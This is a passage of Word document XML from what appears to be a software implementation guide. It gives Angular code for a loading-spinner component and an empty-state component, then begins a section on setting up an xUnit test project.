    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/div&gt;</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styles: [`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .spinner-wrap { display:flex; flex-direction:column; align-items:center; gap:12px; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .spinner-svg { animation: spin 0.8s linear infinite; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .spinner-track { stroke: var(--border-subtle); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .spinner-arc   { stroke: var(--brand-primary); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        @keyframes spin { to { transform: rotate(360deg); } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .sm .spinner-svg { width:20px; height:20px; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .md .spinner-svg { width:32px; height:32px; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .lg .spinner-svg { width:48px; height:48px; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .spinner-label { font-size:var(--text-sm); color:var(--text-muted); }</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export class SpinnerComponent {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @Input() size: "sm" | "md" | "lg" = "md";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @Input() label = "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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Usage: &lt;app-spinner size="sm" /&gt; or &lt;app-spinner label="Loading policies..." /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// Replace all &lt;div class="spinner"&gt;&lt;/div&gt; and &lt;div class="loader-ring"&gt; usages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec6-4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4  Empty State Component</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New File: src/app/shared/empty-state/empty-state.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">@Component({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    selector: "app-empty-state",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    standalone: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    imports: [CommonModule],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    template: `</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;div class="empty-state"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;div class="empty-icon"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;span class="material-icons-round"&gt;{{ icon }}&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h3 class="empty-title"&gt;{{ title }}&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p class="empty-description"&gt;{{ description }}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;ng-content&gt;&lt;/ng-content&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/div&gt;</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styles: [`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .empty-state { text-align:center; padding:64px 32px; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .empty-icon { width:72px; height:72px; border-radius:20px;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            background:var(--bg-elevated); margin:0 auto 24px;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            display:flex; align-items:center; justify-content:center; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .empty-icon span { font-size:36px; color:var(--text-muted); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .empty-title { font-size:var(--text-xl); font-weight:var(--weight-bold);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            color:var(--text-primary); margin:0 0 8px; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .empty-description { font-size:var(--text-base); color:var(--text-secondary);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            margin:0 0 24px; max-width:360px; margin-inline:auto; }</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export class EmptyStateComponent {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @Input() icon = "inbox";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @Input() title = "Nothing here yet";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    @Input() description = "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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Usage examples:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// &lt;app-empty-state icon="description" title="No policies found"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">//     description="Try adjusting your search or create a new policy."&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">//     &lt;a routerLink="/policies/new" class="btn btn-primary"&gt;New Policy&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// &lt;/app-empty-state&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec7" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 7 — Test Suite Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec7-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1  Backend — xUnit Test Project Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Create the test project</w:t>
      </w:r>
    </w:p>
